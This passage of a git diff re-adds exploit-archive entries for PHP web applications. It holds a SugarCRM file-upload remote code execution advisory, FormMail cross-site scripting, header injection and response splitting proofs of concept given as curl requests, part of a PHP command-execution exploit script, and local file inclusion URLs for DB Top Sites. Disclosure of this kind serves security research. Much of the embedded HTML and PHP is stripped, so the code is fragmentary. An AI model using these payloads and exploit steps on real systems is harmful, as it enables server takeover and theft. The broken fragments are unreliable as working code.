To obtaint the real filename -look in the HTML response for a string like: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - - - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -The real filename in this case is "6e25aba0-9dc4-2a57-8bae-4a1317b35d47. -php". Now the attacker has to find the directory where the file resides. - -Again searching the HTML page for the attribute "assigned_user_id" -reveals the needed information: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -
    - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -At this point the attacker has all the informations to invoke the -uploaded file. - -Filename: 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php -Assigned user id: abf7c77b-2f71-8071-63ba-4a131068e9a2 - -To directly request it issue a request to: - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -http://www.example.com/cache/modules/Emails/abf7c77b-2f71-8071-63ba-4a13 -1068e9a2/6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php - ---8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- - -As final note: if the user is "administrator", "assigned_user_id" is -always "1". - -IV. DETECTION - -SugarCRM 5.2.0e and possibly earlier versions are vulnerable. - -V. WORKAROUND - -Upgrade to latest version 5.2.0f - -VI. VENDOR RESPONSE - -"We have fixed the issue and will be shipping the patch on June 12th. -We will be doing a full pass of quality assurance in this area to -ensure that no other issues crop up around file uploads. -The fix involves modifying the code that handles uploads for email -attachments to save the files using just a GUID rather than the original -file name. This is similar to how uploads are handled else where in the -application and should prevent the code from being executable on the -server side." - -VII. CVE INFORMATION - -No CVE at this time. - -VIII. DISCLOSURE TIMELINE - -20090519 Bug discovered -20090528 First vendor contact -20090528 Vendor Response -20090530 Vendor Confirm the vulnerability -20090602 Vendor propose a possible fix and path release -20090612 Vendor released SugarCRM 5.2.0f (Vulnerability fixed) -20090613 Advisory released - -IX. CREDIT - -Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni -"evilaliv3" Pellerano are credited with the discovery of this -vulnerability. 
- -Antonio "s4tan" Parata -web site: http://www.ush.it/ -mail: s4tan AT ush DOT it - -Francesco "ascii" Ongaro -web site: http://www.ush.it/ -mail: ascii AT ush DOT it - -Giovanni "evilaliv3" Pellerano -web site: http://www.ush.it/, http://www.evilaliv3.org/ -mail: evilaliv3 AT ush DOT it - -X. LEGAL NOTICES - -Copyright (c) 2009 Francesco "ascii" Ongaro - -Permission is granted for the redistribution of this alert -electronically. It may not be edited in any way without mine express -written consent. If you wish to reprint the whole or any -part of this alert in any other medium other than electronically, -please email me for permission. - -Disclaimer: The information in the advisory is believed to be accurate -at the time of publishing based on currently available information. Use -of the information constitutes acceptance for use in an AS IS condition. -There are no warranties with regard to this information. Neither the -author nor the publisher accepts any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, -this information. - -# milw0rm.com [2009-06-15] +SugarCRM 5.2.0e Remote Code Execution + + Name Remote Code Execution in SugarCRM + Systems Affected Sugar CRM 5.2.0e and possibly earlier versions + Severity High + Impact (CVSSv2) High 8/10, vector: (AV:N/AC:L/Au:S/C:P/I:C/A:P) + Vendor http://www.sugarcrm.com + Advisory http://www.ush.it/team/ush/hack-sugarcrm_520e/adv.txt + Authors Antonio "s4tan" Parata (s4tan AT ush DOT it) + Francesco "ascii" Ongaro (ascii AT ush DOT it) + Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it) + Date 20090613 + +I. BACKGROUND + +>From the SugarCRM web site: "Sugar Express is designed for individuals +and small companies. Core CRM features help employees get on the same +page while more complex functionality is stripped away. 
Sugar Express is +ideal for providing a single view of the customer from the initial +marketing campaign through the sales cycle and on to customer support. +With Sugar Express, companies have a single system of truth for managing +customer interactions.". + +II. DESCRIPTION + +A Remote Code Execution Vulnerability exists in SugarCRM software. + +III. ANALYSIS + +Summary: + +A Remote Code Execution issue has been found in SugarCRM version +5.2.0e. In order to exploit this vulnerability an account on the system +is required. + +The vulnerability resides in the "Compose Email" section. The software +permits sending email with attachments (if not disabled by the +administrator). When the name of the file is specified, a validation +routine is called: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +function safeAttachmentName($filename) { + global $sugar_config; + $badExtension = false; + //get position of last "." in file name + $file_ext_beg = strrpos($filename, "."); + $file_ext = ""; + //get file extension + if($file_ext_beg > 0) { + $file_ext = substr($filename, $file_ext_beg + 1); + } + //check to see if this is a file with extension located in "badext" + foreach($sugar_config['upload_badext'] as $badExt) { + if(strtolower($file_ext) == strtolower($badExt)) { + //if found, then append with .txt and break out of lookup + $filename = $filename . ".txt"; + $badExtension = true; + break; // no need to look for more + } // if + } // foreach + return $badExtension; +} + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +This routine checks if the extension of the filename is blacklisted, +if so the ".txt" extension is appended to the filename. 
However there is +a coding error: the function assumes that the filename (extension +excluded) is at least one char long, this assumption is derived from the +statement: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +if($file_ext_beg > 0) + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +Of course this is a bad assumption, if we set the whole filename to +".php" than the check is skipped and a void extension is assumed. +Because void extensions are not in the blacklist, no futher extension +is added to the filename. After this check a file is created on the +filesystem in the form "". + +Where "id" is an alphanumeric string. With the trick illustrated we are +able to create a file with ".php" extension. To do this upload a new +file attachment and set the filename to ".php". + +After this the attacker has to find the name of the file that was +uploaded in the attachment list files. To obtaint the real filename +look in the HTML response for a string like: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + + + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +The real filename in this case is "6e25aba0-9dc4-2a57-8bae-4a1317b35d47. +php". Now the attacker has to find the directory where the file resides. + +Again searching the HTML page for the attribute "assigned_user_id" +reveals the needed information: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + + + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +At this point the attacker has all the informations to invoke the +uploaded file. 
+ +Filename: 6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php +Assigned user id: abf7c77b-2f71-8071-63ba-4a131068e9a2 + +To directly request it issue a request to: + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +http://www.example.com/cache/modules/Emails/abf7c77b-2f71-8071-63ba-4a13 +1068e9a2/6e25aba0-9dc4-2a57-8bae-4a1317b35d47.php + +--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- + +As final note: if the user is "administrator", "assigned_user_id" is +always "1". + +IV. DETECTION + +SugarCRM 5.2.0e and possibly earlier versions are vulnerable. + +V. WORKAROUND + +Upgrade to latest version 5.2.0f + +VI. VENDOR RESPONSE + +"We have fixed the issue and will be shipping the patch on June 12th. +We will be doing a full pass of quality assurance in this area to +ensure that no other issues crop up around file uploads. +The fix involves modifying the code that handles uploads for email +attachments to save the files using just a GUID rather than the original +file name. This is similar to how uploads are handled else where in the +application and should prevent the code from being executable on the +server side." + +VII. CVE INFORMATION + +No CVE at this time. + +VIII. DISCLOSURE TIMELINE + +20090519 Bug discovered +20090528 First vendor contact +20090528 Vendor Response +20090530 Vendor Confirm the vulnerability +20090602 Vendor propose a possible fix and path release +20090612 Vendor released SugarCRM 5.2.0f (Vulnerability fixed) +20090613 Advisory released + +IX. CREDIT + +Antonio "s4tan" Parata, Francesco "ascii" Ongaro and Giovanni +"evilaliv3" Pellerano are credited with the discovery of this +vulnerability. + +Antonio "s4tan" Parata +web site: http://www.ush.it/ +mail: s4tan AT ush DOT it + +Francesco "ascii" Ongaro +web site: http://www.ush.it/ +mail: ascii AT ush DOT it + +Giovanni "evilaliv3" Pellerano +web site: http://www.ush.it/, http://www.evilaliv3.org/ +mail: evilaliv3 AT ush DOT it + +X. 
LEGAL NOTICES + +Copyright (c) 2009 Francesco "ascii" Ongaro + +Permission is granted for the redistribution of this alert +electronically. It may not be edited in any way without mine express +written consent. If you wish to reprint the whole or any +part of this alert in any other medium other than electronically, +please email me for permission. + +Disclaimer: The information in the advisory is believed to be accurate +at the time of publishing based on currently available information. Use +of the information constitutes acceptance for use in an AS IS condition. +There are no warranties with regard to this information. Neither the +author nor the publisher accepts any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information. + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8950.txt b/platforms/php/webapps/8950.txt index 01233485b..c1deb3151 100755 --- a/platforms/php/webapps/8950.txt +++ b/platforms/php/webapps/8950.txt 
@@ -1,262 +1,262 @@ -FormMail 1.92 Multiple Vulnerabilities - - Name Multiple Vulnerabilities in FormMail - Systems Affected FormMail 1.92 and possibly earlier versions - Severity Medium - Impact (CVSSv2) Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) - Vendor http://www.scriptarchive.com/formmail.html - Advisory http://www.ush.it/team/ush/hack-formmail_192/adv.txt - Authors Francesco "ascii" Ongaro (ascii AT ush DOT it) - Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it) - Antonio "s4tan" Parata (s4tan AT ush DOT it) - Date 20090511 - -I. BACKGROUND - -FormMail is a generic HTML form to e-mail gateway that parses the results -of any form and sends them to the specified users. This script has many -formatting and operational options, most of which can be specified within -each form, meaning you don't need programming knowledge or multiple -scripts for multiple forms. This also makes FormMail the perfect -system-wide solution for allowing users form-based user feedback -capabilities without the risks of allowing freedom of CGI access. There -are several downloading options available below and more information on -this script can be found in the Readme file. FormMail is quite possibily -the most used CGI program on the internet, having been downloaded over -2,000,000 times since 1997. - -II. DESCRIPTION - -Multiple Vulnerabilities exist in FormMail software. - -III. ANALYSIS - -Summary: - - A) Prelude to the vulnerabities - B) Cross Site Scripting - C) HTTP Response Header Injection - D) HTTP Response Splitting - -A) Prelude to the vulnerabities - -What follows is the code used to validate the user input: - -Line 283: $safeConfig array definition. 
- ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - - foreach $field (keys %Config) { - $safeConfig{$field} = &clean_html($Config{$field}); - } - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -Line 518: definition of clean_html function, used to generate the -"$safeConfig" array from "$Config". - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - - # This function will convert <, >, & and " to their HTML equivalents. - sub clean_html { - local $value = $_[0]; - $value =~ s/\&/\&/g; - $value =~ s//\>/g; - $value =~ s/"/\"/g; - return $value; - } - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -These functions are not always applied to the user input and don't -protect against all the attack vectors (as URI or DOM XSS that can work -also if encoded), this is why various vulnerabilities exist. - -B) Cross Site Scripting vulnerability - -Line 293: the "redirect" variable is used to write the location header -value. Its value is not filtered so it's possible to perform both -HTTP Header Injection and an HTTP Response Splitting attacks. - -Since Header Injection is one of the most versatile attack vectors we -could use it (like "downgrade it") to perform a Cross Site Scripting -attack but it would not represent a different vulnerability. - -In this case we are already inside a "Location" response header and it's -possible to perform an XSS without splitting the response and using the -standard Apache page for the 302 Found HTTP status. - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -# If redirect option is used, print the redirectional location header. 
-if ($Config{'redirect'}) { - print "Location: $safeConfig{'redirect'}\n\n"; -} - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -XSS vulnerability example: - -http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire -ct=javascript:alert(%27USH%27); - -Response: - -$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub -ject=1&redirect=javascript:alert(%27USH%27);" - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -HTTP/1.1 302 Found -Date: Sat, 11 Apr 2009 14:12:11 GMT -Server: Apache -Location: javascript:alert('USH'); -Content-Length: 267 -Content-Type: text/html; charset=iso-8859-1 - - -302 Found - -

    Found

    -

    The document has moved here.

    -
    -
    Apache Server at 127.0.0.1 Port 80
    - - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -Obiously the XSS is not automatic since browsers don't follow the -"javascript:" URI handler in the "Location" header. - -A second XSS vulnerability, not based on HTTP tricks, exists: in the -following code the the "$return_link" variable is reflected (printed) in -the page body without any validation: - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -Line 371: the "$return_link" variable is printed in the page body -without any validation. - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -# Check for a Return Link and print one if found. # -if ($Config{'return_link_url'} && $Config{'return_link_title'}) { - print "\n"; -} - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -The vulnerability can be triggered with the following request: - -$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subj -ect=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH" - -This XSS is not automatic. - -C) HTTP Response Header Injection - -An HTTP Response Header Injection vulnerability exists, the following -request triggers the vulnerability: - -$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub -ject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3 -DHTTPHeaderInjection;" - -Can be verified with the obvious "javascript:alert(document.cookie)". - -D) HTTP Response Splitting - -Thanks to the full exploitability of the Header Injection vulnerability -an HTTP Response Splitting can be performed. 
- -The following request is an example of the attack: - -http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire -ct=http://www.ush.it%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20te -xt/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Typ -e:%20text/plain%0D%0Ahttp://www.ush.it - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub -ject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/p -lain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%2 -0text/plain%0D%0Ahttp://www.ush.it" -HTTP/1.1 302 Found -Date: Sun, 12 Apr 2009 23:01:18 GMT -Server: Apache -Content-Length: 0 -Location: -Transfer-Encoding: chunked -Content-Type: text/plain - -HTTP/1.1 200 OK -Content-Type: text/plain -http://www.ush.it - ---8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- - -HTTP Response Splitting can be used to trigger a number of different -vectors, ranging from automatic Reflected XSS to Browser and Proxy -Cache Poisoning. - -IV. DETECTION - -FormMail 1.92 and possibly earlier versions are vulnerable. - -V. WORKAROUND - -VI. VENDOR RESPONSE - -VII. CVE INFORMATION - -No CVE at this time. - -VIII. DISCLOSURE TIMELINE - -20070501 Bug discovered -20070531 Initial vendor contact (Thu, 31 May 2007 22:21:39 +0200) --- No response and the bug sleeped for some time in ascii's mind -- -20090505 Second vendor contact --- Giving up, will have better results with forced disclosure -- -20090511 Advisory Release - -IX. CREDIT - -Francesco "ascii" Ongaro, Giovanni "evilaliv3" Pellerano and Antonio -"s4tan" Parata are credited with the discovery of this vulnerability. 
- -Francesco "ascii" Ongaro -web site: http://www.ush.it/ -mail: ascii AT ush DOT it - -Giovanni "evilaliv3" Pellerano -web site: http://www.evilaliv3.org -mail: giovanni.pellerano AT evilaliv3 DOT org - -Antonio "s4tan" Parata -web site: http://www.ictsc.it/ -mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it - -X. LEGAL NOTICES - -Copyright (c) 2009 Francesco "ascii" Ongaro - -Permission is granted for the redistribution of this alert -electronically. It may not be edited in any way without mine express -written consent. If you wish to reprint the whole or any -part of this alert in any other medium other than electronically, -please email me for permission. - -Disclaimer: The information in the advisory is believed to be accurate -at the time of publishing based on currently available information. Use -of the information constitutes acceptance for use in an AS IS condition. -There are no warranties with regard to this information. Neither the -author nor the publisher accepts any liability for any direct, indirect, -or consequential loss or damage arising from use of, or reliance on, -this information. - -# milw0rm.com [2009-06-15] +FormMail 1.92 Multiple Vulnerabilities + + Name Multiple Vulnerabilities in FormMail + Systems Affected FormMail 1.92 and possibly earlier versions + Severity Medium + Impact (CVSSv2) Medium 4.3/10, vector: (AV:N/AC:M/Au:N/C:P/I:N/A:N) + Vendor http://www.scriptarchive.com/formmail.html + Advisory http://www.ush.it/team/ush/hack-formmail_192/adv.txt + Authors Francesco "ascii" Ongaro (ascii AT ush DOT it) + Giovanni "evilaliv3" Pellerano (evilaliv3 AT ush DOT it) + Antonio "s4tan" Parata (s4tan AT ush DOT it) + Date 20090511 + +I. BACKGROUND + +FormMail is a generic HTML form to e-mail gateway that parses the results +of any form and sends them to the specified users. 
This script has many +formatting and operational options, most of which can be specified within +each form, meaning you don't need programming knowledge or multiple +scripts for multiple forms. This also makes FormMail the perfect +system-wide solution for allowing users form-based user feedback +capabilities without the risks of allowing freedom of CGI access. There +are several downloading options available below and more information on +this script can be found in the Readme file. FormMail is quite possibily +the most used CGI program on the internet, having been downloaded over +2,000,000 times since 1997. + +II. DESCRIPTION + +Multiple Vulnerabilities exist in FormMail software. + +III. ANALYSIS + +Summary: + + A) Prelude to the vulnerabities + B) Cross Site Scripting + C) HTTP Response Header Injection + D) HTTP Response Splitting + +A) Prelude to the vulnerabities + +What follows is the code used to validate the user input: + +Line 283: $safeConfig array definition. + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + + foreach $field (keys %Config) { + $safeConfig{$field} = &clean_html($Config{$field}); + } + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +Line 518: definition of clean_html function, used to generate the +"$safeConfig" array from "$Config". + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + + # This function will convert <, >, & and " to their HTML equivalents. + sub clean_html { + local $value = $_[0]; + $value =~ s/\&/\&/g; + $value =~ s//\>/g; + $value =~ s/"/\"/g; + return $value; + } + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +These functions are not always applied to the user input and don't +protect against all the attack vectors (as URI or DOM XSS that can work +also if encoded), this is why various vulnerabilities exist. 
+ +B) Cross Site Scripting vulnerability + +Line 293: the "redirect" variable is used to write the location header +value. Its value is not filtered so it's possible to perform both +HTTP Header Injection and an HTTP Response Splitting attacks. + +Since Header Injection is one of the most versatile attack vectors we +could use it (like "downgrade it") to perform a Cross Site Scripting +attack but it would not represent a different vulnerability. + +In this case we are already inside a "Location" response header and it's +possible to perform an XSS without splitting the response and using the +standard Apache page for the 302 Found HTTP status. + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +# If redirect option is used, print the redirectional location header. +if ($Config{'redirect'}) { + print "Location: $safeConfig{'redirect'}\n\n"; +} + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +XSS vulnerability example: + +http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire +ct=javascript:alert(%27USH%27); + +Response: + +$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub +ject=1&redirect=javascript:alert(%27USH%27);" + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +HTTP/1.1 302 Found +Date: Sat, 11 Apr 2009 14:12:11 GMT +Server: Apache +Location: javascript:alert('USH'); +Content-Length: 267 +Content-Type: text/html; charset=iso-8859-1 + + +302 Found + +

    Found

    +

    The document has moved here.

    +
    +
    Apache Server at 127.0.0.1 Port 80
    + + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +Obiously the XSS is not automatic since browsers don't follow the +"javascript:" URI handler in the "Location" header. + +A second XSS vulnerability, not based on HTTP tricks, exists: in the +following code the the "$return_link" variable is reflected (printed) in +the page body without any validation: + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +Line 371: the "$return_link" variable is printed in the page body +without any validation. + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +# Check for a Return Link and print one if found. # +if ($Config{'return_link_url'} && $Config{'return_link_title'}) { + print "\n"; +} + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +The vulnerability can be triggered with the following request: + +$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subj +ect=1&return_link_url=javascript:alert(%27USH%27);&return_link_title=USH" + +This XSS is not automatic. + +C) HTTP Response Header Injection + +An HTTP Response Header Injection vulnerability exists, the following +request triggers the vulnerability: + +$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub +ject=1&redirect=http://www.example.com%0D%0aSet-Cookie:auth%3DUSH;vuln%3 +DHTTPHeaderInjection;" + +Can be verified with the obvious "javascript:alert(document.cookie)". + +D) HTTP Response Splitting + +Thanks to the full exploitability of the Header Injection vulnerability +an HTTP Response Splitting can be performed. 
+ +The following request is an example of the attack: + +http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&subject=1&redire +ct=http://www.ush.it%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20te +xt/plain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Typ +e:%20text/plain%0D%0Ahttp://www.ush.it + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +$ curl -kis "http://127.0.0.1/FormMail.pl?recipient=foobar@ush.it&sub +ject=1&redirect=%0D%0A%0FContent-Length:%200%0D%0AContent-Type:%20text/p +lain%0D%0AStatus:302%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:%2 +0text/plain%0D%0Ahttp://www.ush.it" +HTTP/1.1 302 Found +Date: Sun, 12 Apr 2009 23:01:18 GMT +Server: Apache +Content-Length: 0 +Location: +Transfer-Encoding: chunked +Content-Type: text/plain + +HTTP/1.1 200 OK +Content-Type: text/plain +http://www.ush.it + +--8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-8<-- + +HTTP Response Splitting can be used to trigger a number of different +vectors, ranging from automatic Reflected XSS to Browser and Proxy +Cache Poisoning. + +IV. DETECTION + +FormMail 1.92 and possibly earlier versions are vulnerable. + +V. WORKAROUND + +VI. VENDOR RESPONSE + +VII. CVE INFORMATION + +No CVE at this time. + +VIII. DISCLOSURE TIMELINE + +20070501 Bug discovered +20070531 Initial vendor contact (Thu, 31 May 2007 22:21:39 +0200) +-- No response and the bug sleeped for some time in ascii's mind -- +20090505 Second vendor contact +-- Giving up, will have better results with forced disclosure -- +20090511 Advisory Release + +IX. CREDIT + +Francesco "ascii" Ongaro, Giovanni "evilaliv3" Pellerano and Antonio +"s4tan" Parata are credited with the discovery of this vulnerability. 
+ +Francesco "ascii" Ongaro +web site: http://www.ush.it/ +mail: ascii AT ush DOT it + +Giovanni "evilaliv3" Pellerano +web site: http://www.evilaliv3.org +mail: giovanni.pellerano AT evilaliv3 DOT org + +Antonio "s4tan" Parata +web site: http://www.ictsc.it/ +mail: s4tan AT ictsc DOT it, s4tan AT ush DOT it + +X. LEGAL NOTICES + +Copyright (c) 2009 Francesco "ascii" Ongaro + +Permission is granted for the redistribution of this alert +electronically. It may not be edited in any way without mine express +written consent. If you wish to reprint the whole or any +part of this alert in any other medium other than electronically, +please email me for permission. + +Disclaimer: The information in the advisory is believed to be accurate +at the time of publishing based on currently available information. Use +of the information constitutes acceptance for use in an AS IS condition. +There are no warranties with regard to this information. Neither the +author nor the publisher accepts any liability for any direct, indirect, +or consequential loss or damage arising from use of, or reliance on, +this information. + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8951.php b/platforms/php/webapps/8951.php index 8280ea64d..48449c14f 100755 --- a/platforms/php/webapps/8951.php +++ b/platforms/php/webapps/8951.php @@ -1,163 +1,163 @@ -"; -$fp = fopen($filename, 'a+'); -fputs($fp, $html) or die("Could not open file!"); - ---------------------------------- - -We see how data is added in the file,the variables -including our evil code. - -So if we register as an user with the location : - -\";?> ---------------------------------- - -So we can succesfully execute our commands. - ------------------------------------------------------------- - -[+] Notes - -You can change my PHP code ( $codphp ) with what you want. -Example : - -$codphp = "\";?>Click here to go back and execute another command

    "; -print "Command result:

    " . nl2br($result) . "

    "; -} - -else -{ - -?> - - -Site:
    -Command:

    - -
    - - - -# milw0rm.com [2009-06-15] +"; +$fp = fopen($filename, 'a+'); +fputs($fp, $html) or die("Could not open file!"); + +--------------------------------- + +We see how data is added in the file,the variables +including our evil code. + +So if we register as an user with the location : + +\";?> +--------------------------------- + +So we can succesfully execute our commands. + +------------------------------------------------------------ + +[+] Notes + +You can change my PHP code ( $codphp ) with what you want. +Example : + +$codphp = "\";?>Click here to go back and execute another command

    "; +print "Command result:

    " . nl2br($result) . "

    "; +} + +else +{ + +?> + +
    +Site:
    +Command:

    + +
    + + + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8952.txt b/platforms/php/webapps/8952.txt index 9f3acda85..a36b3b3a3 100755 --- a/platforms/php/webapps/8952.txt +++ b/platforms/php/webapps/8952.txt 
@@ -1,30 +1,30 @@ -###################################################################### -[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability -[+] Discovered By SirGod -[+] www.mortal-team.org -####################################################################### - -[+] Local File Inclusion - - - Vulnerable code is everywhere - -------------------------------------------------------------------------------------------------------- -if ( $u != "" ) { - -if ( file_exists( "./sites/session/$u.session.php" ) ){ -include "./sites/session/$u.session.php"; -include "./sites/$u.php"; -------------------------------------------------------------------------------------------------------- - -- PoC's - - http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00 - - http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00 - - http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00 - - -####################################################################### - -# milw0rm.com [2009-06-15] +###################################################################### +[+] DB Top Sites v1.0 (index.php u) Local File Inclusion Vulnerability +[+] Discovered By SirGod +[+] www.mortal-team.org +####################################################################### + +[+] Local File Inclusion + + - Vulnerable code is everywhere + +------------------------------------------------------------------------------------------------------- +if ( $u != "" ) { + +if ( file_exists( "./sites/session/$u.session.php" ) ){ +include "./sites/session/$u.session.php"; +include "./sites/$u.php"; +------------------------------------------------------------------------------------------------------- + +- PoC's + + http://127.0.0.1/[path]/full.php?u=../../../../../../BOOTSECT.BAK%00 + + http://127.0.0.1/[path]/index.php?u=../../../../../../BOOTSECT.BAK%00 + + http://127.0.0.1/[path]/contact.php?u=../../../../../../BOOTSECT.BAK%00 + + 
+####################################################################### + +# milw0rm.com [2009-06-15] diff --git a/platforms/php/webapps/8953.txt b/platforms/php/webapps/8953.txt index edfe0d15e..9b6d72fdd 100755 --- a/platforms/php/webapps/8953.txt +++ b/platforms/php/webapps/8953.txt 
